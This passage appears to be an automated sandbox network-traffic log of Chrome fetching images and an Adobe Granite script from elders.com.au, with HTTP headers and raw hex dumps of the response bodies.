                                                                                                                                    2024-11-05 08:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    125192.168.2.449901162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC515OUTGET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:24 UTC701INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 2373
                                                                                                                                    Connection: close
                                                                                                                                    Last-Modified: Fri, 27 Jan 2023 07:07:35 GMT
                                                                                                                                    ETag: "0x8DB00352B0AF601"
                                                                                                                                    Content-Disposition: attachment; filename="teamwork-icon.png"; filename*=UTF-8''teamwork-icon.png
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    Age: 1
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210046-DFW
                                                                                                                                    X-Cache: MISS
                                                                                                                                    X-Timer: S1709585777.027117,VS0,VS0,VE1450
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c08950467d-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC668INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1f 08 06 00 00 00 f0 6c 7d 07 00 00 00 09 70 48 59 73 00 00 32 c0 00 00 32 c0 01 28 64 5a db 00 00 05 ca 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 31 33 37 2e 64 61 34 61 37 65 35 2c 20 32 30 32 32 2f 31 31 2f 32 37 2d 30 39 3a 33 35 3a 30 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                    Data Ascii: PNGIHDRl}pHYs22(dZiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 54 31 37 3a 32 34 3a 35 34 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 36 35 64 63 62 65 30 2d 61 61 64 63 2d 61 33 34 65 2d 38 34 30 66 2d 38 34 63 32 31 32 36 61 65 63 34 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a
                                                                                                                                    Data Ascii: T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:
                                                                                                                                    2024-11-05 08:03:24 UTC336INData Raw: f1 2e e0 74 e4 c7 30 76 78 ba 05 4a 1a a5 4f e2 6c 6d c3 fb 70 12 47 42 62 6c 49 13 f1 7a 4f 1a 7f 13 0a 29 95 af 05 0e 61 b5 aa c0 a7 3a 07 3f 87 47 e0 c0 43 81 4f b1 d0 e4 57 48 23 b3 31 4e c1 07 61 8e c3 42 18 17 6a 81 f7 a5 42 6c 52 7e 72 55 da 5f b0 58 a2 e4 db 2e 70 c9 57 31 51 17 43 4a 73 56 5d e0 bf 23 a1 02 2f e3 9f 16 db bf 4a 3e ae d2 1a 70 bd 0b bc e3 05 51 d3 ee da ee ae 96 3c 91 33 2c 79 01 5b b5 ca cd f6 36 96 7a d2 1b 28 67 b4 89 32 8c e1 5f 96 dc 13 38 19 78 ac 6a b9 8b 91 b7 71 69 34 c3 d3 3e da e3 86 61 7f d0 93 7f 21 44 d5 81 20 d6 8c 46 df eb bd 5e 1b 14 a3 fb ad 71 7b 32 27 8d 3a b9 f2 7e 49 4a e7 ed 21 f9 6c 56 b0 05 a9 47 7f c3 4a e4 a3 6a 7d bb f5 80 30 3d b9 ea c0 2a 40 51 f0 09 8e b7 6d b0 a6 e5 92 e7 ab ea 4e 90 06 a3 c6 aa 2e
                                                                                                                                    Data Ascii: .t0vxJOlmpGBblIzO)a:?GCOWH#1NaBjBlR~rU_X.pW1QCJsV]#/J>pQ<3,y[6z(g2_8xjqi4>a!D F^q{2':~IJ!lVGJj}0=*@QmN.


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    126192.168.2.449906162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC535OUTGET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:25 UTC757INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                    Content-Length: 93735
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    Cf-Bgj: h2pri
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    content-disposition: attachment; filename="rpu_q2_2024_landingpagebanner.jpg"; filename*=UTF-8''rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                    etag: "0x8DCF3252165C79D"
                                                                                                                                    last-modified: Wed, 23 Oct 2024 05:39:57 GMT
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-served-by: cache-pao-kpao1770030-PAO
                                                                                                                                    x-timer: S1729727994.150794,VS0,VS0,VE1143
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 2
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c17e29e54a-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC612INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 01 90 02 58 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIF``CCX"}!1AQa"q2
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 0c 03 01 00 02 11 03 11 00 3f 00 fd 53 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a
                                                                                                                                    Data Ascii: ?S((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 3f f8 9a f9 31 66 2d d2 b5 ac f5 27 da aa 57 24 77 34 a5 49 74 63 8d 56 df bc 8f a8 07 c4 2f 0f 9e 9a 86 40 f4 86 4f fe 26 a7 1e 36 d1 4b 60 5e e4 fb 44 e7 ff 00 65 af 9c 15 fc e5 46 f3 5a 35 04 36 d0 70 32 2b a6 d3 bc 4f 15 9c de 64 87 71 7e aa b8 c7 d6 b8 aa 73 c7 e0 d4 ed a6 a1 2f 8b 43 db 63 f1 76 93 34 81 12 e5 99 cf 45 10 c9 ff 00 c4 d3 e6 f1 46 9b 6f 8f 32 67 5c f4 cc 32 73 ff 00 8e d7 82 dc 78 aa 48 75 07 9e de 72 4e e2 46 7b 57 5d a5 f8 ea 4b bd 36 30 d2 07 74 e5 dd 80 27 71 ec 3f 0a c6 53 ab 05 76 8d 14 21 27 68 9e 92 3c 5d a5 16 0b f6 96 0c 7b 18 64 1f fb 2d 5e 87 54 b6 b8 5c c7 21 23 dd 18 7f 31 5e 55 ff 00 09 67 96 c1 80 52 dd 37 30 19 c5 69 27 8e 25 68 86 3c b5 e3 19 db 51 1c 43 fb 48 b9 50 fe 53 d1 fe d9 08 19 2f 81 ee 0d 54 7f 10 e9 f1 b1
                                                                                                                                    Data Ascii: ?1f-'W$w4ItcV/@O&6K`^DeFZ56p2+Odq~s/Ccv4EFo2g\2sxHurNF{W]K60t'q?Sv!'h<]{d-^T\!#1^UgR70i'%h<QCHPS/T
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: f3 c2 da 85 ac 22 13 11 73 26 e6 e4 82 0f 43 c5 5e 8f 4c 8e cd e3 30 c8 e8 37 02 ca 79 0c 71 fa 56 91 9c db d5 68 67 28 c5 2f 33 a4 fe d0 83 24 6f ff 00 c7 4f f8 51 59 54 57 49 9d 8d ea 28 a2 82 42 be 2d f8 c9 e3 99 bc 71 e3 6b d9 92 5d da 7d ab 1b 6b 44 07 e5 d8 a7 05 be ac 72 7e 98 1d ab eb bf 17 5e 3e 9b e1 3d 6a ee 26 db 24 16 53 4a ad e8 56 36 20 fe 95 f0 af f6 4b b0 f9 65 5c d6 f4 ad bb 30 ab 77 a2 2b ac a7 b9 a9 16 ec ad 29 d1 66 ef 22 d4 8b a3 7a c9 9a ea e6 47 37 23 05 d4 8a f7 a9 17 50 e7 ef 52 ae 8b 1f 77 34 d9 34 d8 93 a4 86 8e 64 1c 8c b5 0e a0 bc 64 d5 9f b6 c2 df c4 07 e3 59 5f 61 8d 7a 48 68 5b 78 d4 f0 f9 fa d2 d0 35 46 d2 de 26 46 d6 ce 3b ad 5d 86 ed 76 82 cd f8 56 14 4a 37 05 03 1e c0 54 fe 67 ef 02 74 ed 4a c8 d1 36 6c b5 d4 72 36 37
                                                                                                                                    Data Ascii: "s&C^L07yqVhg(/3$oOQYTWI(B-qk]}kDr~^>=j&$SJV6 Ke\0w+)f"zG7#PRw44ddY_azHh[x5F&F;]vVJ7TgtJ6lr67
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 05 91 10 e0 2f 99 83 8f c6 af 2b 36 d0 4a e0 e3 a6 7a 57 5c 36 39 e5 b8 ea 2a 1b 86 9b ca 3f 67 0a 65 ed e6 74 ac 69 6e b5 f0 38 b4 8c 77 f9 30 7f 0a a7 2e 51 25 73 79 51 63 5c 2a 85 1e c2 96 a8 e9 b7 97 37 11 e2 e6 d9 a1 7f ef 63 00 d5 dd d4 45 a6 b4 16 c2 d1 49 9a 33 54 00 ca 19 48 23 20 f5 06 92 38 d2 25 c2 28 41 fe cd 2e ea 5c d1 e6 01 45 14 50 01 45 14 50 01 45 14 50 01 47 bf 7a 28 a0 02 8a 28 a0 02 97 34 94 50 03 12 14 8d 99 95 15 59 8e 58 81 c9 a7 d1 9a 4d d4 00 b4 51 f8 d1 40 1b d4 51 45 04 18 3e 3d 05 bc 0b e2 20 06 49 d3 6e 46 07 fd 72 6a f8 de 3b 29 3f e7 93 7e 46 be ce f1 93 6d f0 86 b8 7d 2c 67 3f f9 0d ab e6 9b 1b c2 f8 52 03 0f a5 3e 67 15 74 8a 8c 14 dd 9b 38 f5 d3 d9 97 95 6f ca a5 5d 34 37 a8 af 50 b0 d1 e0 ba 64 25 23 e7 a8 c5 6d 37 c3
                                                                                                                                    Data Ascii: /+6JzW\69*?getin8w0.Q%syQc\*7cEI3TH# 8%(A.\EPEPEPGz((4PYXMQ@QE>= InFrj;)?~Fm},g?R>gt8o]47Pd%#m7
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 00 67 48 21 88 07 ff 00 59 ff 00 2c d9 88 55 1c f2 4f 4a fd 65 f3 bc d6 66 3d cd 76 60 e1 19 73 36 b4 fe ae 79 b8 fe 6a 73 8a be bf a7 43 35 3c 23 a4 2c 0f 09 b3 8d e3 73 93 b8 7f 2a cb be f8 5d e1 9b d9 0c 8d 65 e4 67 af 96 f8 5f ca ba 90 d4 1c 30 20 8c 83 d8 d7 a2 a9 c2 3f 0a b1 e5 73 c9 ee cf 3c 97 e0 a6 88 f2 e6 da f6 48 c6 79 8d 80 6f eb 52 c3 f0 66 c2 10 0a de 30 6e ff 00 27 1f ce bb af b3 c0 30 44 51 82 39 1f 2d 4a 5a 9f 2d fe 27 f8 b0 e6 b6 df 92 38 c8 7e 15 e9 f1 cc b2 1b 86 38 1f dd ef 5a 36 fe 07 82 dd 70 2e 9d b2 72 58 f0 7e 82 b8 9f da 1b e3 f5 87 c0 3f 0c 59 df 4d 67 fd a7 aa ea 32 bc 56 56 6c fb 13 08 01 79 5c f5 da b9 51 81 c9 24 0e 2a 8f c0 4f 8f 29 f1 3b c3 cd 3e ad 25 bd b5 f2 48 63 61 1f 19 6e a4 63 b2 e3 a1 e9 d4 67 8a e0 ab 57 0f 4e
                                                                                                                                    Data Ascii: gH!Y,UOJef=v`s6yjsC5<#,s*]eg_0 ?s<HyoRf0n'0DQ9-JZ-'8~8Z6p.rX~?YMg2VVly\Q$*O);>%HcancgWN
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: e1 ff 00 0a f8 5b c4 da ad f4 1a 4d c3 45 ad a5 8d e2 ff 00 62 dc ee c8 31 b2 0e 67 99 3f bd 9d 8b d3 0c dd 3e 1f f1 71 92 5b ad 8e d8 94 3b 23 ee ee 14 e1 4f fd f3 8a aa b3 2a dc 43 1a 80 b1 a1 da aa bc 01 d8 63 f3 ab 5e 2e 9b cc f1 15 cf 18 01 53 1d f9 2a 09 3f 9d 79 9a ca a7 3b dc fa 47 42 30 8c 69 47 63 1a 1b 57 3b 57 7a 28 ed f2 d7 55 a1 58 dc 2c e8 e6 f6 de 36 fb b1 c9 2a 30 03 fd 96 2b 93 b4 9c 76 e3 ad 72 e6 62 14 9c f4 e9 56 ec f5 26 db e4 0f 94 13 bb 76 7d b9 a2 a2 94 91 e8 61 9d 1a 72 b4 95 fe 6c fd 7d fd 89 fe 1e e9 5e 09 f8 43 36 a7 a5 eb 30 f8 81 fc 45 76 2e e5 bf 87 82 8a 88 02 5b 48 a1 99 55 e2 63 20 3b 78 6c 86 ef 5f 41 29 af cb 6f d8 17 e2 b5 ff 00 81 fe 33 69 da 07 da 9b fb 03 c4 b2 0b 1b cb 57 6f 93 cd 2a 7c 99 80 e8 1c 30 db 9e e1 88
                                                                                                                                    Data Ascii: [MEb1g?>q[;#O*Cc^.S*?y;GB0iGcW;Wz(UX,6*0+vrbV&v}arl}^C60Ev.[HUc ;xl_A)o3iWo*|0
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 6c e3 1b 25 76 63 79 7a bb 90 22 86 52 c7 81 f2 e4 d5 5d 49 75 8b 49 14 de 79 d1 e3 e5 1b fa 7d 2b ab fe dc d6 63 55 db 6d 3a 10 3f 78 c1 08 f3 3d 09 e3 8c 7b 56 75 dd e5 e5 f6 56 e6 de 49 b1 c1 57 8d 8f ff 00 aa b4 85 49 27 ac 51 12 82 6b 76 72 bb c3 48 0c 9b 48 f5 02 9e ac 8a 7e 42 0d 6d 9b 3b 5e 37 58 48 be bd 46 7f 4a 9f 6e 94 9c 2e 96 c7 d7 cc 95 89 fc 30 2b a1 e2 17 f2 bf c0 c5 51 7d ff 00 33 9e 69 24 6e 00 e2 93 74 9c 67 35 b9 24 7a 73 0c 0b 42 9f f6 d4 d4 96 c3 4b 8b fd 65 9b ca 7b 7e fc 8f e9 47 d6 34 f8 43 d8 eb b9 83 b9 f3 8c 1a 5d cf dc e2 ba 91 a8 5a 2a 85 8e c6 38 47 e0 c7 f3 35 22 de 5a 6c da 6d 23 93 dd d5 4f f4 ac be b1 2f e4 34 f6 2b f9 8e 50 37 bd 38 49 cf 5a e9 bc eb 2c e7 ec 63 ea 31 fe 15 24 73 59 46 a7 64 41 4b 75 c2 2e 69 7d 61 ff
                                                                                                                                    Data Ascii: l%vcyz"R]IuIy}+cUm:?x={VuVIWI'QkvrHH~Bm;^7XHFJn.0+Q}3i$ntg5$zsBKe{~G4C]Z*8G5"Zlm#O/4+P78IZ,c1$sYFdAKu.i}a
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 53 9e 43 64 74 ae 93 4f b3 9e 35 65 9c e1 08 c6 cc f5 a9 af 0c d0 ac 62 08 84 ab d0 86 1b 88 fc e8 f6 72 6b 99 b0 f6 8a f6 48 c6 b6 f1 43 c7 1e d9 21 13 38 e8 f9 c1 3f 5a b2 be 26 2c 06 6d 80 fa 36 6b 49 6c e0 91 77 4b 6f 11 72 3e 6f 94 56 3d d6 e8 59 91 2c 8f 96 09 01 8a 93 55 2f 69 04 b5 12 e4 93 d8 b6 9e 23 8d 9b 06 06 03 d7 70 a9 17 5f 87 6f fa a7 dd e9 91 8a c5 67 19 e6 dc c7 ea 70 6a 41 24 27 f8 71 ed 51 ed a7 dc bf 67 1e c6 a4 da d2 49 1b 2a c6 41 23 ab 1e 94 5a eb 11 ac 61 1a 36 ca 8e 58 11 cd 53 91 6c 7e ce a0 39 32 b7 3c 37 4a a5 26 d5 e1 7f 9d 0e ac 93 bd c1 42 2f 4b 1b bf db 96 fd 0a bf e1 8a 46 d7 ed a3 ea b2 7e 42 b9 d4 ff 00 81 1a 56 d3 ef 25 f9 96 d6 72 3b 7c b5 3f 58 a8 f6 1f b2 87 53 72 4d 6a c6 e5 76 ca 92 7d 31 4d 17 7a 53 63 fd 1f 3f
                                                                                                                                    Data Ascii: SCdtO5ebrkHC!8?Z&,m6kIlwKor>oV=Y,U/i#p_ogpjA$'qQgI*A#Za6XSl~92<7J&B/KF~BV%r;|?XSrMjv}1MzSc?
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 2f 6a 54 0c fe ee e4 ff 00 51 59 ba d4 23 bc e3 ff 00 81 c4 b5 77 b5 fe e6 7a 95 af 85 ac 2d 58 3c 8a 66 38 e5 64 20 8a 4b cd 0f 4f 8d 59 97 4f 66 18 cf ee 5c 83 ff 00 d6 af 36 4f 8a 7a 23 72 d2 ed 3d 3e 59 95 b9 ac cd 7f e3 c7 87 fc 23 62 9a 95 fd dc b0 d9 34 ab 0f 9d 6e af 39 46 73 84 dc 14 70 18 e1 41 3c 64 81 91 9a 16 2a 83 f7 54 a3 ff 00 81 45 94 a1 26 fa fd cc f4 8c 68 d1 b0 12 59 dc 21 f4 67 38 a8 2f 17 48 92 3f f4 78 6e 23 7c f5 dc 31 fa d7 1f a5 fc 6b d2 3c 45 0c be 4d e4 c6 28 65 6b 77 37 80 41 fb d5 c6 f8 c0 90 02 59 09 01 80 c8 19 1c f3 57 e4 f1 a6 9d 71 f2 c7 6d 18 95 54 b1 54 94 06 20 0e 4e de b8 fa 0a 3d a4 5e 9c cb ef 57 34 71 71 7e f2 7f 89 bd a6 db da ad f4 52 99 65 8c c7 fb c1 c0 3f 32 8c 8f d4 57 e0 de a9 78 75 3d 6b 50 b9 92 53 24 d7
                                                                                                                                    Data Ascii: /jTQY#wz-X<f8d KOYOf\6Oz#r=>Y#b4n9FspA<d*TE&hY!g8/H?xn#|1k<EM(ekw7AYWqmTT N=^W4qq~Re?2Wxu=kPS$


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    127192.168.2.449905162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC633OUTGET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:25 UTC611INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 27 Feb 2024 20:17:52 GMT
                                                                                                                                    etag: W/"2151-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-sjc1000105-SJC
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1710180973.161103,VS0,VS0,VE1
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 451883
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c1a9bc4671-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC758INData Raw: 32 31 35 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 53 6c 69 6e 67 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 53 45 4c 45 43 54 4f 52 5f 49 4e 46 49 4e 49 54 59 3a 22 2e 69 6e 66 69 6e 69 74 79 22 2c 43 48 41 52 53 45 54 3a 22 5f 63 68 61 72 73 65 74 5f 22 2c 53 54 41 54 55 53 3a 22 3a 73 74 61 74 75 73 22 2c 53 54 41 54 55 53 5f 42 52 4f 57 53 45 52 3a 22 62 72 6f 77 73 65 72 22 2c 4f 50 45 52 41 54 49 4f 4e 3a 22 3a 6f 70 65 72 61 74
                                                                                                                                    Data Ascii: 2151(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operat
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 74 69 6c 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 70 61 74 63 68 54 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 68 29 7b 69 66 28 68 29 69 66 28 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 68 29 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 30 7d 22 2c 68 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 68 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 22 2b 65 2b 22 7d 22 2c 68 5b 65 5d 29 3b 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 54 6f 70 57 69 6e 64 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 3b 69 66 28 74 68 69 73 2e 69 46 72 61 6d 65
                                                                                                                                    Data Ascii: til=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this.iFrame
